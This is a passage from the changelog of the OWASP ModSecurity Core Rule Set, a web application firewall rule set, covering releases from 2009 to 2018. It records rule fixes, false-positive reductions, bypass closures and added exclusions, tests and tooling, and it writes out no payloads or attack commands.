Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt) + * Fix bug in 943120 (XeroChen) + +## Version 3.1.0 - 2018-08-07 + + * Add Detectify scanner (Andrea Menin) + * Renaming matched_var/s (Victor Hora) + * Remove lines with bare '#' comment char (Walter Hop) + * Drop the XML variable from rule 932190 (Federico G. Schwindt) + * Update outdated URLs (Walter Hop) + * remove unused rule 901180 (Walter Hop) + * Drop exit from unix and windows RCE (Federico G. Schwindt) + * Fix anomaly_score counters (Federico G. Schwindt) + * Remove mostly redundant 944220 in favor of 944240 (Christian Folini) + * Add self[ and document[ to rule 941180 (Andrea Menin) + * Provide proxy support within CRS docker image (Scott O'Neil) + * Prevent bypass in rule 930120 PL3 (Andrea Menin) + * Fix small typo in variable (Felipe Zipitría) + * Fix bug #1166 in Docker image (Franziska Bühler) + * Remove revision status from rules (Federico G. Schwindt) + * Add template for issues (Federico G. Schwindt) + * Correct failing travis tests in merge situations (Federico G. Schwindt) + * Remove unused global variable in IIS rules (Chaim Sanders) + * Refactor to use phase number instead of name (Federico G. Schwindt) + * Add uploaded file name check; refresh LFI / filename checks (Walter Hop) + * Introduce critical sibling of 920340 in PL2 (Walter Hop) + * Fix bypass caused by multiple spaces in RCE rules (Walter Hop) + * Remove unneeded regex capture groups (Federico G. Schwindt) + * Add built-in exceptions for CPanel (Christoph Hansen) + * Add additional file restrictios for ws_ftp, DS_Store... (Jose Nazario) + * Fix missing strings in 942410 (Franziska Bühler) + * Add 2 missing PDO errors (Christoph Hansen) + * Fix issues with FPs in regression tests (Chaim Sanders) + * Add Nextcloud client exclusion support (Christoph Hansen) + * Fix spelling mistakes in REQUEST-942- (Padraig Doran, Chaim Sanders) + * Explicitly ignore the user defined rules (Aaron Haaf, Chaim Sanders) + * Add regression tests for 942490 (Christoph Hansen, Chaim Sanders) + * Add Owncloud client exclusion support (Christoph Hansen, Christian Folini) + * Adding 'F-Secure Radar' vulnerability scanner UA (Christian Folini, Chaim Sanders) + * Update DockerFile to use Ubuntu as base (Chaim Sanders) + * False positives 942360: move alter and union (Franziska Bühler, Chaim Sanders) + * Add support for Java style attacks (Manuel Spartan, Walter Hop) + * Fix various regression tests issues caused by webserver handling (azhao155, Chaim Sanders) + * Update TravisCI to build on a per PR basis (Chaim Sanders) + * Optimized rule 921160 and regex (Allan Boll, Chaim Sanders) + * Update the consistency across various files (Federico G. Schwindt) + * Add missing transform, 944120 sibling 944240 (Manuel Spartan) + * Fix false positive for 'like' in 942120 (Walter Hop) + * Add regression tests for Java Rules (Manuel Spartan) + * Fixup and small reorg of dokuwiki rule exclusion package (Christian Folini) + * Make TravisCI tests fail if Apache can't load rules (Felipe Zipitría) + * Add exclusion rules for Dokuwiki (Matt Bagley, Christian Folini) + * Initial exclusions for NextCloud installs (Matt Bagley, Christian Folini) + * Added struts-pwn UA to list (Manuel Spartan) + * Uses MULTIPART_MISSING_SEMICOLON instead of MULTIPART_SEMICOLON_MISSING (Felipe Zimmerle) + * Add file upload checks (Manuel Spartan) + * Check if Transfer-Encoding is missing (Federico G. Schwindt, Christian Folini) + * Remove duplicated variables (Federico G. Schwindt) + * Reduce FP by splitting classic SQL injection rule 942370 (Christoph Hansen) + * Fix typo in REQUEST-920-PROTOCOL-ENFORCEMENT (ihacku, Franziska Bühler) + * Add configurable timestamp format to FTW integration (Christian Folini) + * Add badges to README (Felipe Zipitría) + * Add clarifying comments to 910110 (Christian Folini) + * Making rule 933131 case-insensitive (Manuel Spartan) + * Merge and reorder rules as part of cleanup (Federico G. Schwindt) + * Update copyright date and syntax (Jose Nazario, Felipe Zipitría) + * Updated SecMarker and SkipAfter names to use meet guidelines (Felipe Zipitría) + * Tidy up single quotes and other guidelines updates (Felipe Zipitría) + * Syntax fix for setvar crs_exclusions_wordpress (Manuel Spartan) + * Updated various contributors to developers (Christian Folini) + * Revise SQL rules by disassembling them into their core protections (Franziska Bühler) + * Add an example payload to 920220 (coolt) + * Add a missing regex to rule 942310 (Franziska Bühler) + * Detect GET or HEAD with Transfer-Encoding header (Federico G. Schwindt) + * Fix broken links in references (Pásztor Gábor) + * Add contributing guidelines (Felipe Zipitría) + * Fix processing bypasses in rule 931130 (Felipe Zipitría, Christian Folini) + * Correct small omissions in unix-shell.data (Walter Hop) + * Add IIS specific detection to LFI-os-files.data (Manuel Spartan) + * Update examples to match the current cleanup (Federico G. Schwindt) + * Corrected the ordering of actions to meet guidelines (Felipe Zipitría) + * Remove unused capture groups (Federico G. Schwindt) + * Use explicit rx operator (Federico G. Schwindt) + * Update the RCE regular expressions(Walter Hop, Federico G. Schwindt) + * Removing maturity & accuracy from rules (Felipe Zipitría) + * Increasing range header (Christoph Hansen) + * Fixed upgrade.py script argument options (Glyn Mooney) + * Updating to reflect OWASP flagship status (Chaim Sanders) + * Adding Docker support for CRS (Chaim Sanders) + * Initial Travis deployment (Zack Allen, Walter Hop) + * Initial commit of regression tests (Chaim Sanders, Walter Hop) + * Remove test for 921170 because it won't ever fire (Chaim Sanders, Walter Hop) + * Update minor incorrectness in asp.net regex (Chaim Sanders, Walter Hop) + * Add notification for builds against #modsecurity on freenode (Zack Allen, Walter Hop) + * Add all past code contributors and convert to markdown (Walter Hop) + * Block uploads of files with .phps extension (Walter Hop) + * Improve message for script upload with superfluous extension (Walter Hop) + * Remove trailing whitespace in various regexs (Walter Hop) + * Add command popd to direct unix rce list in rule 932150 (Franziska Bühler) + * Remove unnecessary END_XSS_CHECKS marker (Christian Folini) + * Ignore Whitespaces in Rule 942110 (Christoph Hansen) + * Update missing RCE Commands (Umar Farook) + * Update lfi-os-files.data (Umar Farook) + * Removed deprecated t:removeComments from 942100 (Christian Folini) + * Add word boundary to rule 942410 (Franziska Bühler) + +## Version 3.0.2 - 2017-05-12 + + * Remove debug rule that popped up in 3.0.1 (Christian Folini) + + +## Version 3.0.1 - 2017-05-09 + + * SECURITY: Removed insecure handling of X-Forwarded-For header; + reported by Christoph Hansen (Walter Hop) + * Fixed documentation errors in RESPONSE-999-... (Chaim Sanders) + * Reduced FPs on 942190 by adding a word boundary to regex (Franziska Bühler) + * Reduced FPs on 932150 by removing keyword reset (Franziska Bühler) + * Tidied exceptions in 930100 (Roberto Paprocki) + * Reduced FPs for 920120 by splitting into stricter sibling (Franziska Bühler) + * Simplified some Drupal rule exclusions (Damien McKenna, Christian Folini) + * Extended KNOWN_BUGS with remarks on JSON support on Debian (Franziska Bühler) + * Updated README to add gitter support (Chaim Sanders) + * Clarified DoS documentation for static extensions (Roberto Paprocki) + * Added application/octet-stream to allowed content types (Christian Folini) + * Typo in 942220 alert message (Chaim Sanders, @bossloper) + * Moved referrer check of 941100 into new PL2 rule (Franziska Bühler) + * Closed multiple @pmf evasions via lowercase transformation (Roberto Paprocki) + * Clarified libinjection bundling in INSTALL file (@cjdp) + * Reduced FPs via Wordpress Rule Exclusions (Walter Hop) + * Support for RFC 3902 (Content Type application/soap+xml; Christoph Hansen) + Make sure you update ModSecurity recommended rule 200000 as well. + * Bugfix in 942410 regex (Christian Folini) + * Reduced FPs for 942360 (Walter Hop) + * Reduced FPs for 941120 by restricting event handler names (Franziska Bühler) + * Extended 931000 with scheme "file" to fix false negative (Federico Schwindt) + * Extended 905100 and 905110 for HTTP/2.0 (includes bugfix, Christoph Hansen) + * Moved 941150 from PL1 to PL2; includes Bugfix for rule (Christian Folini) + * Updated documentation for 920260 (Chaim Sanders) + * Bugfix in upgrade.py (Victor Hora) + * Fixed FP in RCE rule 932140 (Walter Hop) + * Fixed comment for arg limit check rule 920370 (Christian Folini) + * Created CONTRIBUTORS file + * Added Christoph Hansen (emphazer) to CONTRIBUTORS file + * Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file + * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) + + +## Version 3.0.0 - 2016-11-10 + +Huge changeset running in separate branch from September 2013 to September 2016. +This is a cursory summary of the most important changes: + + * Huge reduction of false positives (Ryan Barnett, Felipe Zimmerle, Chaim + Sanders, Walter Hop, Christian Folini) + * Anomaly scoring is the new default, renamed thresholds from + tx.(in|out)bound_anomaly_score_level to + tx.(in|out)bound_anomaly_score_threshold + * Introduction of libinjection for SQLi detection + * Introduction of libinjection for XSS detection + * Big improvement on detection of Remote Command Execution (Walter Hop) + * Big improvement on PHP function name detection (Walter Hop) + * Paranoia Mode (Christian Folini, Noël Zindel, Franziska Bühler, + Manuel Leos, Walter Hop) + * Shifted dozens of rules into higher paranoia levels + * Introduced a lot of stricter sibling rules in higher levels + * Generic mechanism to support application specific rule exclusions + (Chaim Sanders) + * Initial Wordpress rule exclusions (Walter Hop) + * Initial Drupal rule exclusions (Christian Folini, @emphazer) + * Renumbering of rules. See folder id_renumbering for a + csv map (Chaim Sanders) + * Consolidation of rules, namely XSS and SQLi (Spider Labs/Trustwave team) + * Sampling mode / Easing in (Christian Folini) + * Cleanup of reputation checks / persistent blocking + (Christian Folini / Walter Hop) + * Tags much more systematic (Walter Hop) + * IP reputation checks / persistent blocking of certain clients + (Spider Labs/Trustwave team) + * Phase actions use request/response/logging now instead of + numerical phases (Spider Labs/Trustwave team) + * Added NoScript XSS Filters (Spider Labs/Trustwave team) + * Updated "severity" action to use words (CRITICAL, WARNING, etc...) + vs. numbers (5, 4, etc..) + * Various regex fixes after research by Vladimir Ivanov (Chaim Sanders) + * Overhaul of the regression mode into debug mode (Walter Hop, Ryan Barnett) + * Introduction of util/upgrade.py (Walter Hop) + * Removal of GeoIP database. Download via util/upgrade.py now. + * Introduction of Initialization rules with + default values (Walter Hop, Christian Folini) + * Sorting out terminology with + whitelisting and rule exclusions (Christian Folini) + * Overhaul of testing (Chaim Sanders) + * Protection from HTTP Parameter Pollution (Franziska Bühler) + * Simplification of setup config file, renamed file to crs-setup.conf.example + * Improved session fixation detection logic (Christian Peron, credits to + Eric Hodel for the discovery) + * Updated list of malicious webscanners + * Splitting scanner user agents data files (github user @ygrek) + * Countless bugfixes in severities, anomaly scores, tags, etc. + across the board + * Cleanup of formerly experimental DDoS rules, + fix documentation (Ryan Barnett, Christian Folini) + * Improves http blacklist checks (Walter Hop) + * Extended XSS detection (as suggested by Mazin Ahmed) + * Added support for Travis CI + * Added support for HTTP/2 in recent Apache 2.4 (Walter Hop) + * Added many, many bots and scanners (among others suggested by + github user @toby78, @jamuse, Matt Koch) + * Fixed mime types suitable for XML processor (Chaim Sanders) + * Include script in util/join-multiline-rules to work around + Apache 2.4 < 2.4.11 bug with long lines (Walter Hop) + * New detection for request smuggling attacks (Achim Hofmann, + Christian Folini) + * Fixes with project honeypot setup (Ryan Barnett) + * Separated DB / SQL messages by DB software (Ryan Barnett) + * CPanel integration (Chaim Sanders) + * Introduction of var for static resources (Chaim Sanders) + * Many improvements to rules in 2014/5 (Ryan Barnett) + + +## Version 2.2.9 - 2013-09-30 + +Improvements: +* Updated the /util directory structure + + +Bug Fixes: +* fix 950901 - word boundary added +* modsecurity_35_bad_robots.data - gecko/25 blocks Firefox Android + https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/157 + + +## Version 2.2.8 - 2013-06-30 + +Improvements: +* Updatd the /util directory structure +* Added scripts to check Rule ID duplicates +* Added script to remove v2.7 actions so older ModSecurity rules will work + - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/43 +* Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope) + - http://seclists.org/fulldisclosure/2013/Jun/21 + - http://blog.spiderlabs.com/2013/06/honeypot-alert-active-exploits-attempts-for-plesk-vulnerability-.html + + +Bug Fixes: +* fix 950901 - word boundary added + - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/48 +* fix regex error + - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/44 +* Updated the Regex in 981244 to include word boundaries + - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/36 +* Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2 + - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/34 +* ModSecurity: No action id present within the rule - ignore_static.conf + - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/17 +* "Bad robots" rule blocks all Java applets on Windows XP machines + - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/16 +* duplicated rules id 981173 + - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/18 + + +## Version 2.2.7 - 2012-12-19 + +Improvements: +* Added JS Overrides file to identify successful XSS probes +* Added new XSS Detection Rules from Ashar Javed (http://twitter.com/soaj1664ashar) + - http://jsfiddle.net/U9RmU/4/ +* Updated the SQLi Filters to add in Oracle specific functions + - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/7 + +Bug Fixes: +* Fixed Session Hijacking rules + - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/8 +* Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable + + +## Version 2.2.6 - 2012-09-14 + +Improvements: +* Started rule formatting update for better readability +* Added maturity and accuracy action data to each rule +* Updated rule revision (rev) action +* Added rule version (ver) action +* Added more regression tests (util/regression_tests/) +* Modified Rule ID 960342 to block large file attachments in phase:1 +* Removed all PARANOID rule checks +* Added new Session Fixation rules + +Bug Fixes: +* Fixed missing ending double-quotes in XSS rules file +* Moved SecDefaultAction setting from phase:2 to phase:1 +* Fixed Session Hijacking SessionID Regex + https://www.modsecurity.org/tracker/browse/CORERULES-79 +* Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME + https://www.modsecurity.org/tracker/browse/CORERULES-78 + + +## Version 2.2.5 - 2012-06-14 + +Security Fixes: +* Updated the anomaly scoring value for rule ID 960000 to critical + (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) + (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses) +* Updated Content-Type check to fix possible evasion with @within + (Identified by Qualys Vulnerability & Malware Research Labs (VMRL)) + (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses) + +Improvements: +* Renamed main config file to modsecurity_crs_10_setup.conf +* Updated the rule IDs to start from CRS reserved range: 900000 +* Updated rule formatting for readability +* Updated the CSRF rules to use UNIQUE_ID as the token source +* Added the zap2modsec.pl script to the /util directory which converts + OWASP ZAP Scanner XML data into ModSecurity Virtual Patches +* Updated the Directory Traversal Signatures to include more obfuscated data +* Added Arachni Scanner Integration Lua script/rules files + +Bug Fixes: +* Added forceRequestBodyVariable action to rule ID 960904 + + +## Version 2.2.4 - 2012-03-14 + +Improvements: +* Added Location and Set-Cookie checks to Response Splitting rule ID 950910 +* Added a README file to the activated_rules directory +* Consolidate a number of SQL Injection rules into optimized regexs +* Removed multiMatch and replaceComments from SQL Injection rules +* Updated the SQLi regexs for greediness +* Updated the SQLi setvar anomaly score values to use macro expansion +* Removed PARANOID mode rules + +Bug Fixes: +* Fixed missing comma before severity action in rules 958291, 958230 and 958231 +* Fixed duplidate rule IDs + + +## Version 2.2.3 - 2011-12-19 + +Improvements: +* Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file + http://websecuritytool.codeplex.com/wikipage?title=Checks#cookies +* Added Watcher Charset Checks to optional_rules/modsecurity_crs_55_application_defects.conf file + http://websecuritytool.codeplex.com/wikipage?title=Checks#charset +* Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file + http://websecuritytool.codeplex.com/wikipage?title=Checks#header + +Bug Fixes: +* Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to + rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs). +* Updated the regex and added tags for RFI rules. + + +## Version 2.2.2 - 2011-09-28 + + +Improvements: +* Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points +* Added new Range header detection checks to prevent Apache DoS +* Added new Security Scanner User-Agent strings +* Added example script to the /util directory to convert Arachni DAST scanner + XML data into ModSecurity virtual patching rules. +* Updated the SQLi Character Anomaly Detection Rules +* Added Host header info to the RESOURCE collection key for AppSensor profiling rules + +Bug Fixes: +* Fixed action list for XSS rules (replaced pass,nolog,auditlog with block) +* Fixed Request Limit rules by removing & from variables +* Fixed Session Hijacking IP/UA hash captures +* Updated the SQLi regex for rule ID 981242 + + +## Version 2.2.1 - 2011-07-20 + + +Improvements: +* Extensive SQL Injection signature updates as a result of the SQLi Challenge + http://www.modsecurity.org/demo/challenge.html +* Updated the SQL Error message detection in response bodies +* Updated SQL Injection signatures to include more DB functions +* Updated the WEAK SQL Injection signatures +* Added tag AppSensor/RE8 to rule ID 960018 + +Bug Fixes: +* Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches + https://www.modsecurity.org/tracker/browse/CORERULES-70 +* Fixed Session Hijacking rules to properly capture IP address network hashes. +* Added the multiMatch action to the SQLi rules +* Fixed a false negative logic flaw within the advanced_filter_converter.lua script +* Fixed missing : in id action in DoS ruleset. +* Updated rule ID 971150 signature to remove ; + + +## Version 2.2.0 - 2011-05-26 + + +Improvements: +* Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2) + http://www.apache.org/licenses/LICENSE-2.0.txt +* Created new INSTALL file outlining quick config setup +* Added a new rule regression testing framework to the /util directory +* Added new activated_rules directory which will allow users to place symlinks pointing + to files they want to run. This allows for easier Apache Include wild-carding +* Adding in new RULE_MATURITY and RULE_ACCURACY tags +* Adding in a check for X-Forwarded-For source IP when creating IP collection +* Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) + http://websecuritytool.codeplex.com/wikipage?title=Checks#charset +* Added new AppSensor rules to experimental_dir + https://owasp.org/www-project-appsensor/ +* Added new Generic Malicious JS checks in outbound content +* Added experimental IP Forensic rules to gather Client hostname/whois info + http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html +* Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules + http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html +* Global collection in the 10 file now uses the Host Request Header as the collection key. + This allows for per-site global collections. +* Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilities. + This includes both converted web rules from Emerging Threats (ET) and from SLR Team. +* Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB +* Added experimental rules for detecting Open Proxy Abuse + http://blog.spiderlabs.com/2011/03/detecting-malice-with-modsecurity-open-proxy-abuse.html +* Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API + http://blog.spiderlabs.com/2011/02/modsecurity-advanced-topic-of-the-week-passive-vulnerability-scanning-part-1-osvdb-checks.html +* Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227) +* Added new SQLi detection rules (959070, 959071 and 959072) +* Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data + https://www.modsecurity.org/tracker/browse/CORERULES-64 + +Bug Fixes: +* Assigned IDs to all active SecRules/SecActions +* Removed rule inversion (!) from rule ID 960902 +* Fixed false negative issue in Response Splitting Rule +* Fixed false negative issue with @validateByteRange check +* Updated the TARGETS listing for rule ID 950908 +* Updated TX data for REQBODY processing +* Changed the pass action to block in the RFI rules in the 40 generic file +* Updated RFI regex to catch IP address usage in hostname + https://www.modsecurity.org/tracker/browse/CORERULES-68 +* Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods. +* Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions. + They will now inherit the settings from the SecDefaultAction + + +## Version 2.1.2 - 2011-02-17 + + +Improvements: +* Added experimental real-time application profiling ruleset. +* Added experimental Lua script for profiling the # of page scripts, iframes, etc.. + which will help to identify successful XSS attacks and planting of malware links. +* Added new CSRF detection rule which will trigger if a subsequent request comes too + quickly (need to use the Ignore Static Content rules). + +Bug Fixes: +* Added missing " in the skipAfter SecAction in the CC Detection rule set + + +## Version 2.1.1 - 2010-12-30 + + +Bug Fixes: +* Updated the 10 config conf file to add in pass action to User-Agent rule +* Updated the CSRF ruleset to conditionally do content injection - if the + csrf token was created by the session hijacking conf file +* Updated the session hijacking conf file to only enforce rules if a SessionID + Cookie was submitted +* Fixed macro expansion setvar bug in the restricted file extension rule +* Moved the comment spam data file into the optional_rules directory + + +## Version 2.1.0 - 2010-12-29 + + +Improvements: +* Added Experimental Lua Converter script to normalize payloads. Based on + PHPIDS Converter code and it used with the advanced filters conf file. +* Changed the name of PHPIDS converted rules to Advanced Filters +* Added Ignore Static Content (Performance enhancement) rule set +* Added XML Enabler (Web Services) rule set which will parse XML data +* Added Authorized Vulnerability Scanning (AVS) Whitelist rule set +* Added Denial of Service (DoS) Protection rule set +* Added Slow HTTP DoS (Connection Consumption) Protection rule set +* Added Brute Force Attack Protection rule set +* Added Session Hijacking Detection rule set +* Added Username Tracking rule set +* Added Authentication Tracking rule set +* Added Anti-Virus Scanning of File Attachments rule set +* Added AV Scanning program to /util directory +* Added Credit Card Usage Tracking/Leakage Prevention rule set +* Added experimental CC Track/PAN Leakage Prevention rule set +* Added an experimental_rules directory to hold new BETA rules +* Moved the local exceptions conf file back into base_rules directory however + it has a ".example" extension to prevent overwriting customized versions + when upgrading +* Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to + the experimental_rules directory +* Adding the REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which will + help to make collections a bit more unique + + + +## Version 2.0.10 - 2010-11-29 + + +Improvements: +* Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS + is running in traditional mode. + +Bug Fixes: +* Moved all skipAfter actions in chained rules to chain starter SecRules + https://www.modsecurity.org/tracker/browse/MODSEC-159 +* Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs + + + +## Version 2.0.9 - 2010-11-17 + + +Improvements: +* Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that + it will not overwrite existing config settings. Users should rename this file to activate + it. +* Traditional detection mode is now the current default +* Users can now more easily toggle between traditional/standard mode vs. anomaly scoring mode + by editing the modsecurity_crs_10_config.conf file +* Updated the disruptive actions in most rules to use "block" action instead of "pass". This + is to allow for the toggling between traditional vs. anomaly scoring modes. +* Removed logging actions from most rules so that it can be controlled from the SecDefaultAction + setting in the modsecurity_crs_10_config.conf file +* Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match + what is used in the PHPIDS rules. These still have the same factor of severity even though + the numbers themselves are smaller. +* Updated the 49 and 59 blocking rules to include the matched logdata +* Updated the TAG data to further classify attack/vuln categories. +* Updated the SQL Injection filters to detect more boolean logic attacks +* Moved some files to optional_rules directory (phpids, Emerging Threats rules) + +Bug Fixes: +* Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote + https://www.modsecurity.org/tracker/browse/CORERULES-63 +* Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher) + https://www.modsecurity.org/tracker/browse/MODSEC-159 +* Fixed restricted file extension bug with macro expansion + https://www.modsecurity.org/tracker/browse/CORERULES-60 +* Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that + it matches what is being set in the sql injection conf file +* Fixed typo in SQL Injection regexs - missing backslash for word boundary (b) + https://www.modsecurity.org/tracker/browse/CORERULES-62 + + +## Version 2.0.8 - 2010-08-27 + + +Improvements: +* Updated the PHPIDS filters +* Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..) +* Updated the SQL Injection filters to account for different quotes +* Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file +* Added Rule ID 950109 to detect multiple URL encodings +* Added two experimental rules to detect anomalous use of special characters + +Bug Fixes: +* Fixed Encoding Detection RegEx (950107 and 950108) +* Fixed rules-updater.pl script to better handle whitespace + https://www.modsecurity.org/tracker/browse/MODSEC-167 +* Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf + https://www.modsecurity.org/tracker/browse/CORERULES-55 +* Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file + https://www.modsecurity.org/tracker/browse/CORERULES-54 +* Updated XSS rule id 958001 to improve the .cookie regex to reduce false positives + https://www.modsecurity.org/tracker/browse/CORERULES-29 + + +## Version 2.0.7 - 2010-06-04 + + +Improvements: +* Added CSRF Protection Ruleset which will use Content Injection to add javascript to + specific outbound data and then validate the csrf token on subsequent requests. +* Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie + flags +* Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied + data being echoed back to user unchanged. +* Added rules-updater.pl script and configuration file to allow users to automatically + download CRS rules from the CRS rules repository. +* Added new SQLi keyword for ciel() and reverse() functions. +* Updated the PHPIDS filters + + +Bug Fixes: +* Fixed false positives for Request Header Name matching in the 30 file by + adding boundary characters. +* Added missing pass actions to @pmFromFile prequalifier rules +* Added backslash to SQLi regex + https://www.modsecurity.org/tracker/browse/CORERULES-41 +* Fixed hard coded anomaly score in PHPIDS filter file + https://www.modsecurity.org/tracker/browse/CORERULES-45 +* Fixed restricted_extension false positive by adding boundary characters + + +## Version 2.0.6 - 2010-02-26 + + +Bug Fixes: +* Added missing transformation functions to SQLi rules. + https://www.modsecurity.org/tracker/browse/CORERULES-32 +* Fixed duplicate rule IDs. + https://www.modsecurity.org/tracker/browse/CORERULES-33 +* Fixed typo in @pmFromFile in the Comment SPAM rules + https://www.modsecurity.org/tracker/browse/CORERULES-34 +* Added macro expansion to Restricted Headers rule + https://www.modsecurity.org/tracker/browse/CORERULES-35 +* Fixed misspelled SecMarker + https://www.modsecurity.org/tracker/browse/CORERULES-36 +* Fixed missing chain action in Content-Type header check + https://www.modsecurity.org/tracker/browse/CORERULES-37 +* Update phpids filters to use pass action instead of block + + +## Version 2.0.5 - 2010-02-01 + + +Improvements: +* Removed previous 10 config files as they may conflict with local customized Mod configs. +* Added a new 10 config file that allows the user to globally set TX variables to turn on/off + PARANOID_MODE inspection, set anomaly score levels and http policies. + Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators. +* Added Rule Logic and Reference links to rules descriptions. +* Added Rule IDs to all rules. +* Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification +* Removed Apache limit directives from the 23 file +* Added macro expansion to 23 file checks. +* Added @pmFromFile check to 35 bad robots file +* Added malicious UA strings to 35 bad robots check +* Created an experimental rules file +* Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection +* Removed TX inspections for generic attacks and reverted to standard ARGS inspection + https://www.modsecurity.org/tracker/browse/MODSEC-120 +* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other + variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) +* Moved converted ET Snort rules to the /optional_rules directory +* Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the + request headers. +* Updated Inbound blocking conf file to use macro expansion from the 10 config file settings +* Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking. +* Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators. +* Updated the SPAMMER RBL check rules logic to only check once per IP/Day. +* Added new outbound malware link detection rules. +* Added PHP "call_user_func" to blacklist + Identified by SOGETI ESEC R&D + +Bug Fixes: +* Removed Non-numeric Rule IDs + https://www.modsecurity.org/tracker/browse/CORERULES-28 +* Updated the variable list on SQLi rules. +* Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring + and blocking + + +## Version 2.0.4 - 2009-11-30 + + +Improvements: +* Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) +* Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found + then search more generically in request_body|request_uri_raw +* Updated PHPIDS rules logic to only set TX variables and to not log. This allows for more clean + exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the + anomaly scores. These rules will then inspect for any TX variables in phase:5 and create appropriate + alerts for any variable matches that exist. + +Bug Fixes: +* Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of + phase:4 which would allow for blocking based on information leakage issues. + + +## Version 2.0.3 - 2009-11-05 + + +Improvements: +* Updated converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) +* Create a new PHPIDS Converter rules file (https://svn.php-ids.org/svn/trunk/lib/IDS/Converter.php) +* Added new rules to identify multipart/form-data bypass attempts +* Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts + +Bug Fixes: +* Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives + https://www.modsecurity.org/tracker/browse/CORERULES-17 +* Added new variable locations to the phpids filters + https://www.modsecurity.org/tracker/browse/CORERULES-19 +* Use of transformation functions can cause false negatives - added multiMatch action to phpids rules + https://www.modsecurity.org/tracker/browse/CORERULES-20 +* Fixed multipart parsing evasion issues by adding strict parsing rules + https://www.modsecurity.org/tracker/browse/CORERULES-21 +* Fixed typo in xss rules (missing |) + https://www.modsecurity.org/tracker/browse/CORERULES-22 +* Fixed regex text in IE8 XSS filters (changed to lowercase) + https://www.modsecurity.org/tracker/browse/CORERULES-23 + + +## Version 2.0.2 - 2009-09-11 + + +Improvements: +* Added converted PHPIDS signatures (https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml) + https://www.modsecurity.org/tracker/browse/CORERULES-13 + +Bug Fixes: +* Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla. + https://www.modsecurity.org/tracker/browse/CORERULES-15 + + +## Version 2.0.1 - 2009-08-07 + + +Improvements: +* Updated the transformation functions used in the XSS/SQLi rules to improve performance + https://www.modsecurity.org/tracker/browse/CORERULES-10 + +* Updated the variable/target list in the XSS rules + https://www.modsecurity.org/tracker/browse/CORERULES-11 + +* Added XSS Filters from IE8 + https://www.modsecurity.org/tracker/browse/CORERULES-12 + +Bug Fixes: +* Rule 958297 - 